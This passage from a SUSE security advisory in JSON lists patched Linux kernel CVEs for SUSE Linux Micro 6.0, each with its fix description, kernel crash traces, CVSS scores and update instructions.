"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23085"
},
{
"cve": "CVE-2026-23086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock/virtio: cap TX credit to local buffer size\n\nThe virtio transports derives its TX credit directly from peer_buf_alloc,\nwhich is set from the remote endpoint\u0027s SO_VM_SOCKETS_BUFFER_SIZE value.\n\nOn the host side this means that the amount of data we are willing to\nqueue for a connection is scaled by a guest-chosen buffer size, rather\nthan the host\u0027s own vsock configuration. A malicious guest can advertise\na large buffer and read slowly, causing the host to allocate a\ncorrespondingly large amount of sk_buff memory.\nThe same thing would happen in the guest with a malicious host, since\nvirtio transports share the same code base.\n\nIntroduce a small helper, virtio_transport_tx_buf_size(), that\nreturns min(peer_buf_alloc, buf_alloc), and use it wherever we consume\npeer_buf_alloc.\n\nThis ensures the effective TX window is bounded by both the peer\u0027s\nadvertised buffer and our own buf_alloc (already clamped to\nbuffer_max_size via SO_VM_SOCKETS_BUFFER_MAX_SIZE), so a remote peer\ncannot force the other to queue more data than allowed by its own\nvsock settings.\n\nOn an unpatched Ubuntu 22.04 host (~64 GiB RAM), running a PoC with\n32 guest vsock connections advertising 2 GiB each and reading slowly\ndrove Slab/SUnreclaim from ~0.5 GiB to ~57 GiB; the system only\nrecovered after killing the QEMU process. That said, if QEMU memory is\nlimited with cgroups, the maximum memory used will be limited.\n\nWith this patch applied:\n\n Before:\n MemFree: ~61.6 GiB\n Slab: ~142 MiB\n SUnreclaim: ~117 MiB\n\n After 32 high-credit connections:\n MemFree: ~61.5 GiB\n Slab: ~178 MiB\n SUnreclaim: ~152 MiB\n\nOnly ~35 MiB increase in Slab/SUnreclaim, no host OOM, and the guest\nremains responsive.\n\nCompatibility with non-virtio transports:\n\n - VMCI uses the AF_VSOCK buffer knobs to size its queue pairs per\n socket based on the local vsk-\u003ebuffer_* values; the remote side\n cannot enlarge those queues beyond what the local endpoint\n configured.\n\n - Hyper-V\u0027s vsock transport uses fixed-size VMBus ring buffers and\n an MTU bound; there is no peer-controlled credit field comparable\n to peer_buf_alloc, and the remote endpoint cannot drive in-flight\n kernel memory above those ring sizes.\n\n - The loopback path reuses virtio_transport_common.c, so it\n naturally follows the same semantics as the virtio transport.\n\nThis change is limited to virtio_transport_common.c and thus affects\nvirtio-vsock, vhost-vsock, and loopback, bringing them in line with the\n\"remote window intersected with local policy\" behaviour that VMCI and\nHyper-V already effectively have.\n\n[Stefano: small adjustments after changing the previous patch]\n[Stefano: tweak the commit message]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23086",
"url": "https://www.suse.com/security/cve/CVE-2026-23086"
},
{
"category": "external",
"summary": "SUSE Bug 1257757 for CVE-2026-23086",
"url": "https://bugzilla.suse.com/1257757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23086"
},
{
"cve": "CVE-2026-23089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free()\n\nWhen snd_usb_create_mixer() fails, snd_usb_mixer_free() frees\nmixer-\u003eid_elems but the controls already added to the card still\nreference the freed memory. Later when snd_card_register() runs,\nthe OSS mixer layer calls their callbacks and hits a use-after-free read.\n\nCall trace:\n get_ctl_value+0x63f/0x820 sound/usb/mixer.c:411\n get_min_max_with_quirks.isra.0+0x240/0x1f40 sound/usb/mixer.c:1241\n mixer_ctl_feature_info+0x26b/0x490 sound/usb/mixer.c:1381\n snd_mixer_oss_build_test+0x174/0x3a0 sound/core/oss/mixer_oss.c:887\n ...\n snd_card_register+0x4ed/0x6d0 sound/core/init.c:923\n usb_audio_probe+0x5ef/0x2a90 sound/usb/card.c:1025\n\nFix by calling snd_ctl_remove() for all mixer controls before freeing\nid_elems. We save the next pointer first because snd_ctl_remove()\nfrees the current element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23089",
"url": "https://www.suse.com/security/cve/CVE-2026-23089"
},
{
"category": "external",
"summary": "SUSE Bug 1257790 for CVE-2026-23089",
"url": "https://bugzilla.suse.com/1257790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23089"
},
{
"cve": "CVE-2026-23090",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23090"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nslimbus: core: fix device reference leak on report present\n\nSlimbus devices can be allocated dynamically upon reception of\nreport-present messages.\n\nMake sure to drop the reference taken when looking up already registered\ndevices.\n\nNote that this requires taking an extra reference in case the device has\nnot yet been registered and has to be allocated.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23090",
"url": "https://www.suse.com/security/cve/CVE-2026-23090"
},
{
"category": "external",
"summary": "SUSE Bug 1257759 for CVE-2026-23090",
"url": "https://bugzilla.suse.com/1257759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23090"
},
{
"cve": "CVE-2026-23091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nintel_th: fix device leak on output open()\n\nMake sure to drop the reference taken when looking up the th device\nduring output device open() on errors and on close().\n\nNote that a recent commit fixed the leak in a couple of open() error\npaths but not all of them, and the reference is still leaking on\nsuccessful open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23091",
"url": "https://www.suse.com/security/cve/CVE-2026-23091"
},
{
"category": "external",
"summary": "SUSE Bug 1257813 for CVE-2026-23091",
"url": "https://bugzilla.suse.com/1257813"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23091"
},
{
"cve": "CVE-2026-23094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nuacce: fix isolate sysfs check condition\n\nuacce supports the device isolation feature. If the driver\nimplements the isolate_err_threshold_read and\nisolate_err_threshold_write callback functions, uacce will create\nsysfs files now. Users can read and configure the isolation policy\nthrough sysfs. Currently, sysfs files are created as long as either\nisolate_err_threshold_read or isolate_err_threshold_write callback\nfunctions are present.\n\nHowever, accessing a non-existent callback function may cause the\nsystem to crash. Therefore, intercept the creation of sysfs if\nneither read nor write exists; create sysfs if either is supported,\nbut intercept unsupported operations at the call site.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23094",
"url": "https://www.suse.com/security/cve/CVE-2026-23094"
},
{
"category": "external",
"summary": "SUSE Bug 1257811 for CVE-2026-23094",
"url": "https://bugzilla.suse.com/1257811"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23094"
},
{
"cve": "CVE-2026-23095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngue: Fix skb memleak with inner IP protocol 0.\n\nsyzbot reported skb memleak below. [0]\n\nThe repro generated a GUE packet with its inner protocol 0.\n\ngue_udp_recv() returns -guehdr-\u003eproto_ctype for \"resubmit\"\nin ip_protocol_deliver_rcu(), but this only works with\nnon-zero protocol number.\n\nLet\u0027s drop such packets.\n\nNote that 0 is a valid number (IPv6 Hop-by-Hop Option).\n\nI think it is not practical to encap HOPOPT in GUE, so once\nsomeone starts to complain, we could pass down a resubmit\nflag pointer to distinguish two zeros from the upper layer:\n\n * no error\n * resubmit HOPOPT\n\n[0]\nBUG: memory leak\nunreferenced object 0xffff888109695a00 (size 240):\n comm \"syz.0.17\", pid 6088, jiffies 4294943096\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 40 c2 10 81 88 ff ff 00 00 00 00 00 00 00 00 .@..............\n backtrace (crc a84b336f):\n kmemleak_alloc_recursive include/linux/kmemleak.h:44 [inline]\n slab_post_alloc_hook mm/slub.c:4958 [inline]\n slab_alloc_node mm/slub.c:5263 [inline]\n kmem_cache_alloc_noprof+0x3b4/0x590 mm/slub.c:5270\n __build_skb+0x23/0x60 net/core/skbuff.c:474\n build_skb+0x20/0x190 net/core/skbuff.c:490\n __tun_build_skb drivers/net/tun.c:1541 [inline]\n tun_build_skb+0x4a1/0xa40 drivers/net/tun.c:1636\n tun_get_user+0xc12/0x2030 drivers/net/tun.c:1770\n tun_chr_write_iter+0x71/0x120 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x45d/0x710 fs/read_write.c:686\n ksys_write+0xa7/0x170 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xa4/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23095",
"url": "https://www.suse.com/security/cve/CVE-2026-23095"
},
{
"category": "external",
"summary": "SUSE Bug 1257808 for CVE-2026-23095",
"url": "https://bugzilla.suse.com/1257808"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23095"
},
{
"cve": "CVE-2026-23096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nuacce: fix cdev handling in the cleanup path\n\nWhen cdev_device_add fails, it internally releases the cdev memory,\nand if cdev_device_del is then executed, it will cause a hang error.\nTo fix it, we check the return value of cdev_device_add() and clear\nuacce-\u003ecdev to avoid calling cdev_device_del in the uacce_remove.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23096",
"url": "https://www.suse.com/security/cve/CVE-2026-23096"
},
{
"category": "external",
"summary": "SUSE Bug 1257809 for CVE-2026-23096",
"url": "https://bugzilla.suse.com/1257809"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23096"
},
{
"cve": "CVE-2026-23099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: limit BOND_MODE_8023AD to Ethernet devices\n\nBOND_MODE_8023AD makes sense for ARPHRD_ETHER only.\n\nsyzbot reported:\n\n BUG: KASAN: global-out-of-bounds in __hw_addr_create net/core/dev_addr_lists.c:63 [inline]\n BUG: KASAN: global-out-of-bounds in __hw_addr_add_ex+0x25d/0x760 net/core/dev_addr_lists.c:118\nRead of size 16 at addr ffffffff8bf94040 by task syz.1.3580/19497\n\nCPU: 1 UID: 0 PID: 19497 Comm: syz.1.3580 Tainted: G L syzkaller #0 PREEMPT(full)\nTainted: [L]=SOFTLOCKUP\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n check_region_inline mm/kasan/generic.c:-1 [inline]\n kasan_check_range+0x2b0/0x2c0 mm/kasan/generic.c:200\n __asan_memcpy+0x29/0x70 mm/kasan/shadow.c:105\n __hw_addr_create net/core/dev_addr_lists.c:63 [inline]\n __hw_addr_add_ex+0x25d/0x760 net/core/dev_addr_lists.c:118\n __dev_mc_add net/core/dev_addr_lists.c:868 [inline]\n dev_mc_add+0xa1/0x120 net/core/dev_addr_lists.c:886\n bond_enslave+0x2b8b/0x3ac0 drivers/net/bonding/bond_main.c:2180\n do_set_master+0x533/0x6d0 net/core/rtnetlink.c:2963\n do_setlink+0xcf0/0x41c0 net/core/rtnetlink.c:3165\n rtnl_changelink net/core/rtnetlink.c:3776 [inline]\n __rtnl_newlink net/core/rtnetlink.c:3935 [inline]\n rtnl_newlink+0x161c/0x1c90 net/core/rtnetlink.c:4072\n rtnetlink_rcv_msg+0x7cf/0xb70 net/core/rtnetlink.c:6958\n netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2550\n netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline]\n netlink_unicast+0x82f/0x9e0 net/netlink/af_netlink.c:1344\n netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1894\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg+0x21c/0x270 net/socket.c:742\n ____sys_sendmsg+0x505/0x820 net/socket.c:2592\n ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2646\n __sys_sendmsg+0x164/0x220 net/socket.c:2678\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0x1dc/0x560 arch/x86/entry/syscall_32.c:307\n do_fast_syscall_32+0x34/0x80 arch/x86/entry/syscall_32.c:332\n entry_SYSENTER_compat_after_hwframe+0x84/0x8e\n \u003c/TASK\u003e\n\nThe buggy address belongs to the variable:\n lacpdu_mcast_addr+0x0/0x40",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23099",
"url": "https://www.suse.com/security/cve/CVE-2026-23099"
},
{
"category": "external",
"summary": "SUSE Bug 1257816 for CVE-2026-23099",
"url": "https://bugzilla.suse.com/1257816"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23099"
},
{
"cve": "CVE-2026-23101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nleds: led-class: Only Add LED to leds_list when it is fully ready\n\nBefore this change the LED was added to leds_list before led_init_core()\ngets called adding it the list before led_classdev.set_brightness_work gets\ninitialized.\n\nThis leaves a window where led_trigger_register() of a LED\u0027s default\ntrigger will call led_trigger_set() which calls led_set_brightness()\nwhich in turn will end up queueing the *uninitialized*\nled_classdev.set_brightness_work.\n\nThis race gets hit by the lenovo-thinkpad-t14s EC driver which registers\n2 LEDs with a default trigger provided by snd_ctl_led.ko in quick\nsuccession. The first led_classdev_register() causes an async modprobe of\nsnd_ctl_led to run and that async modprobe manages to exactly hit\nthe window where the second LED is on the leds_list without led_init_core()\nbeing called for it, resulting in:\n\n ------------[ cut here ]------------\n WARNING: CPU: 11 PID: 5608 at kernel/workqueue.c:4234 __flush_work+0x344/0x390\n Hardware name: LENOVO 21N2S01F0B/21N2S01F0B, BIOS N42ET93W (2.23 ) 09/01/2025\n ...\n Call trace:\n __flush_work+0x344/0x390 (P)\n flush_work+0x2c/0x50\n led_trigger_set+0x1c8/0x340\n led_trigger_register+0x17c/0x1c0\n led_trigger_register_simple+0x84/0xe8\n snd_ctl_led_init+0x40/0xf88 [snd_ctl_led]\n do_one_initcall+0x5c/0x318\n do_init_module+0x9c/0x2b8\n load_module+0x7e0/0x998\n\nClose the race window by moving the adding of the LED to leds_list to\nafter the led_init_core() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23101",
"url": "https://www.suse.com/security/cve/CVE-2026-23101"
},
{
"category": "external",
"summary": "SUSE Bug 1257768 for CVE-2026-23101",
"url": "https://bugzilla.suse.com/1257768"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23101"
},
{
"cve": "CVE-2026-23102",
"ids": [
{
"system_name": "SUSE CVE Page",
